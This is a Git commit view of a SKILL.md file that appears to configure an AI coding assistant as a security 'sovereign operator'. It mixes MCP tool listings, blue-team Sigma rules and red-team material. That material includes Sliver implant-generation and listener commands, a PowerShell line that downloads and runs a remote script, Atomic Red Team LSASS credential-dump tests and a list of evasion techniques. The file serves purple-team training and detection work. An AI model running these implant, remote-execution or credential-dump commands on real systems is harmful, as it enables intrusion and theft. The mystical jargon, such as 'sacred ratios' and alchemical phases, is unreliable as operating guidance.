vaultsovereign/test
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Initial commit - combined iTerm2 scripts

Browse Source 
Contains:
- 1m-brag
- tem
- VaultMesh_Catalog_v1
- VAULTMESH-ETERNAL-PATTERN

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
This commit is contained in:
Vault Sovereign
2025-12-28 03:58:39 +00:00
commit 1583890199
111 changed files with 36978 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

342
VaultMesh_Catalog_v1/skill/sovereign-operator/SKILL.md Normal file
View File

@@ -0,0 +1,342 @@
---
name: sovereign-operator
description: Unified security operations framework combining OFFSEC-MCP (28 MCP tools), VaultMesh architecture, and Advanced Security Labs. Use when operating Shield nodes, invoking MCP tools (proof, mesh, shield, tactical, oracle, chain, recon, agent, mobile), managing VaultMesh subsystems, executing adversary emulation (Caldera, Atomic Red Team), writing Sigma rules, running C2 frameworks (Cobalt Strike, Sliver, Havoc), performing DFIR investigations, conducting purple team exercises, managing braid relationships, or operating in specialized domains (AD, cloud, K8s, mobile, wireless, OT/ICS, API). Triggers on "shield status", "mesh alerts", "tactical execute", "oracle reason", "recon passive", "spawn subsystem", "anchor root", "invoke Tem", "run atomic test", "write sigma rule", "C2 setup", "incident response", or any security operations workflow.
---
# 🜄 Sovereign Operator
Unified framework for security operations, combining:
- **OFFSEC-MCP** — 28 MCP tools across 9 categories
- **VaultMesh** — Self-evolving infrastructure with cryptographic proofs
- **Security Labs** — Adversary emulation, detection engineering, DFIR, and domain expertise
## Mental Model
```
┌─────────────────────────────────────────────────────────────┐
│ SOVEREIGN OPERATOR │
├─────────────────────────────────────────────────────────────┤
│ Brain │ oracle_*, chain │ Reason → Decide → Act │
│ Eyes/Ears │ mesh_*, recon_* │ Observe environment │
│ Spine │ shield_*, agent_* │ Defend + Automate │
│ Hands │ tactical_* │ Execute commands │
│ Memory │ proof_* │ Cryptographic receipts │
├─────────────────────────────────────────────────────────────┤
│ Red Team │ C2, evasion, persistence, lateral movement │
│ Blue Team │ DFIR, Sigma rules, EDR, SIEM correlation │
│ Purple Team │ Adversary emulation, BAS, ATT&CK coverage │
│ VaultMesh │ Subsystems, anchoring, Tem, alchemical cycles│
└─────────────────────────────────────────────────────────────┘
```
## Tool Categories (28 tools / 9 categories)
| Category | Tools | Purpose |
|----------|-------|---------|
| proof | 3 | `proof_generate`, `proof_verify`, `proof_anchor` |
| mesh | 6 | `mesh_console_ping`, `mesh_status`, `mesh_topology`, `mesh_alerts`, `mesh_backups`, `mesh_blast_radius` |
| shield | 3 | `shield_status`, `shield_monitor`, `shield_respond` |
| tactical | 3 | `tactical_execute`, `tactical_playbook`, `tactical_learn` |
| oracle | 2 | `oracle_reason`, `oracle_decide` |
| chain | 1 | `oracle_tactical_chain` (reason→decide→act) |
| recon | 3 | `recon_passive`, `recon_active`, `recon_wifi` |
| agent | 5 | `agent_task`, `agent_list`, `agent_cancel`, `agent_reload_configs`, `agent_config_toggle` |
| mobile | 2 | `mobile_status`, `mobile_execute` |
**Full API:** See `references/api.md`
## Quick Start Sequences
### Health Check
```json
{"tool": "mobile_status", "input": {"include": ["battery", "wifi", "vpn"]}}
{"tool": "mesh_console_ping", "input": {}}
{"tool": "mesh_status", "input": {"include_health": true}}
{"tool": "shield_status", "input": {"include_mesh": true}}
```
### Reason → Decide → Act
```json
{
"tool": "oracle_tactical_chain",
"input": {
"context": "2 unhealthy services, latency elevated",
"constraints": ["read-only", "no destructive actions"],
"objective": "Diagnose and stabilize",
"risk_tolerance": "low",
"dry_run": true
}
}
```
### Passive Reconnaissance
```json
{"tool": "recon_passive", "input": {"target": "example.com", "modules": ["dns", "whois", "certs"]}}
```
### Create Scheduled Agent
```json
{
"tool": "agent_task",
"input": {
"name": "mesh_heartbeat",
"trigger": {"type": "schedule", "interval": 120},
"actions": [{"tool": "mesh_status", "args": {}}, {"tool": "shield_status", "args": {}}],
"on_complete": "log"
}
}
```
## VaultMesh Architecture
VaultMesh operates as a **dual-layer civilization**:
### Layer 1: Kubernetes (The Flesh)
Six organs: 🜄 Governance, 🜂 Automation, 🜃 Treasury, 🜁 Federation, 🜏 Ψ-Field, 🌍 Infrastructure
### Layer 2: Rust Codex (The Soul)
`vm-core`, `vm-cap`, `vm-receipts`, `vm-proof`, `vm-treasury`, `vm-crdt`, `vm-guardian`, `vm-portal`
### Subsystem Spawning
```bash
python3 scripts/spawn_subsystem.py --name threat-analyzer --organ-type psi-field --rust
```
### Multi-Chain Anchoring
```bash
python3 scripts/compute_merkle_root.py --root vaultmesh-architecture --out manifests/hash-manifest.json
bash scripts/multi_anchor.sh manifests/hash-manifest.json
```
**Full VaultMesh details:** See `references/vaultmesh.md`
## Braid Mode — Mutual Attestation
Shield and VaultMesh **braid** by importing foreign Merkle roots:
```json
{"tool": "proof_braid_import", "input": {"url": "http://vaultmesh:9110/api/proof/root", "ledger_name": "vaultmesh"}}
```
| State | Meaning |
|-------|---------|
| none | No foreign roots |
| one_way | Only one side captured |
| bidirectional | Both captured at least one root |
| verified | Bidirectional + no regressions |
| Incident | Severity | Response |
|----------|----------|----------|
| `ROOT_REGRESSION` | CRITICAL | Freeze trust, coordinate with foreign operator |
| `PROOF_COUNT_REGRESSION` | CRITICAL | Same as above |
| `IDENTITY_SHIFT` | CRITICAL | Treat as new ledger unless pre-approved |
**Full braid specification:** See `references/braid.md`
## Red Team Operations
### C2 Frameworks
| Framework | Type | Key Features |
|-----------|------|--------------|
| Cobalt Strike | Commercial | Beacon, Malleable C2, Aggressor |
| Sliver | Open Source | mTLS, WireGuard, multiplayer |
| Havoc | Open Source | Demon agents, stack duplication |
| Brute Ratel C4 | Commercial | EDR evasion, syscall obfuscation |
| Mythic | Open Source | Web UI, multi-agent support |
### Sliver Quick Start
```bash
sliver-server # Start server
generate --mtls 192.168.1.100 --os windows --arch amd64 --save implant.exe
mtls --lhost 0.0.0.0 --lport 8888 # Start listener
```
### Evasion Techniques
- AMSI bypass, ETW patching, unhooking
- Direct syscalls, API hashing
- Sleep obfuscation, stack spoofing
**Full Red Team details:** See `references/redteam.md`
## Blue Team Operations
### DFIR Framework (NIST 800-61r3 + CSF 2.0)
1. **Govern** — IR policies, roles, governance
2. **Identify** — Asset inventory, risk assessment
3. **Protect** — Safeguards, forensic readiness
4. **Detect** — Monitor, anomaly detection, triage
5. **Respond** — Containment, eradication, evidence
6. **Recover** — Restore, lessons learned
### Sigma Rule Development
```yaml
title: LSASS Memory Dump via Procdump
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\procdump.exe'
CommandLine|contains: 'lsass'
condition: selection
level: high
```
### Sigma Conversion
```bash
sigma convert -t splunk -p sysmon rule.yml
sigma convert -t lucene -p ecs_windows rule.yml
```
**Full Blue Team details:** See `references/blueteam.md`
## Purple Team Operations
### Adversary Emulation Frameworks
| Framework | Description |
|-----------|-------------|
| MITRE Caldera | Automated adversary emulation, 527+ procedures |
| Atomic Red Team | 1,225+ tests, 261 techniques, agentless |
| Infection Monkey | Breach simulation, lateral movement |
| PurpleSharp | AD-focused, .NET-based |
### Caldera Setup
```bash
git clone https://github.com/mitre/caldera.git --recursive
pip3 install -r requirements.txt
python3 server.py --insecure # http://localhost:8888
```
### Atomic Red Team Execution
```powershell
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Install-AtomicRedTeam -getAtomics
Invoke-AtomicTest T1003.001 -ShowDetails # LSASS dump
Invoke-AtomicTest T1003.001 -TestNumbers 1
Invoke-AtomicTest T1003.001 -Cleanup
```
### BAS Platforms
- Picus Security, Cymulate, AttackIQ, SafeBreach, XM Cyber
**Full Purple Team details:** See `references/purpleteam.md`
## Specialized Domains
| Domain | Key Topics |
|--------|------------|
| Active Directory | Kerberoasting, DCSync, Golden/Silver tickets, BloodHound |
| Cloud Security | AWS/Azure/GCP misconfigs, CSPM, CNAPP |
| Container/K8s | Pod escape, RBAC abuse, supply chain |
| Mobile Security | Android/iOS testing, Frida, Objection |
| Wireless | WPA3 attacks, rogue AP, deauth |
| Bluetooth/IoT | BLE sniffing, firmware analysis |
| OT/ICS | SCADA, Modbus, IEC 62443 |
| API Security | OWASP API Top 10, GraphQL, JWT |
**Full domain details:** See `references/domains.md`
## Response Patterns
### "Check status" / "What's the health?"
`mobile_status` + `mesh_status` + `shield_status`
### "Analyze this situation"
`oracle_reason` or `oracle_tactical_chain`
### "Run recon on target"
`recon_passive` (DNS/WHOIS) or `recon_active` (requires auth)
### "Test detection for T1003"
→ Atomic Red Team: `Invoke-AtomicTest T1003.001`
### "Write a Sigma rule for X"
→ Generate YAML with logsource/detection/condition
### "Spawn a new subsystem"
`spawn_subsystem.py` with organ type
### "Anchor current state"
`compute_merkle_root.py` + `multi_anchor.sh`
### "Invoke Tem against threat"
`invoke_tem.py` with threat type and remediation
### "Set up C2 infrastructure"
→ Sliver/Cobalt Strike/Havoc setup per `references/redteam.md`
### "Investigate incident"
→ DFIR workflow per `references/blueteam.md`
## Alchemical Transformation Cycle
When the system must evolve:
1. **🜃 Nigredo (Blackening)** — Audit, isolate problems
2. **🜁 Albedo (Whitening)** — Restore from proof, purge invalid data
3. **🜂 Citrinitas (Yellowing)** — Extract patterns, synthesize defenses
4. **🜄 Rubedo (Reddening)** — Deploy improvements, anchor new state
**Triggers:** Threat detection, stagnation, audit findings, upgrade requests
## Tem — The Remembrance Guardian
Invoked when threats are detected. Transmutes attacks into evolutionary catalysts.
**Threat Types:** `integrity-violation`, `capability-breach`, `treasury-exploit`, `dos-attack`, `injection`
```bash
python3 scripts/invoke_tem.py --threat-type integrity-violation --realm demo --auto-remediate
```
## Safety Guardrails
- **tactical_execute:** Risk classification, blocks destructive commands in safe_mode
- **recon_active:** Requires `authorization` parameter
- **All high-impact tools:** Emit cryptographic proofs
- **Braid invariants:** Monotonic time, non-decreasing proof counts
## Forbidden Patterns
**Never:**
- Execute destructive commands without authorization
- Skip proofs for high-impact actions
- Accept regressed roots in braid mode
- Run active recon without auth ticket
- Skip alchemical phases in evolution
**Always:**
- Emit proofs for significant actions
- Respect braid invariants
- Use safe_mode for tactical operations
- Document in LAWCHAIN for governance events
- Apply sacred ratios (φ, π, e) in scaling decisions
## Environment
```bash
VAULTMESH_ENDPOINT=http://100.80.246.127:9090
OLLAMA_HOST=http://localhost:11434
OLLAMA_MODEL=qwen2.5:7b
SOVEREIGN_NODE_ID=shield-01
OFFSEC_MODE=full # full|demo|offline|test
```
## MCP Resources
- `sovereign://node/identity` — Node ID
- `sovereign://mesh/status` — Mesh health
- `sovereign://proofs/log` — Proof log
- `sovereign://agent/tasks` — Agent tasks
- `sovereign://shield/threats` — Threat history
## References
- `references/api.md` — Full MCP tool API (28 tools)
- `references/vaultmesh.md` — Architecture, subsystems, anchoring, Tem
- `references/braid.md` — Mutual attestation specification
- `references/redteam.md` — C2 frameworks, evasion, persistence, OPSEC
- `references/blueteam.md` — DFIR, Sigma rules, detection engineering
- `references/purpleteam.md` — Adversary emulation, BAS, ATT&CK coverage
- `references/domains.md` — AD, cloud, K8s, mobile, wireless, OT/ICS, API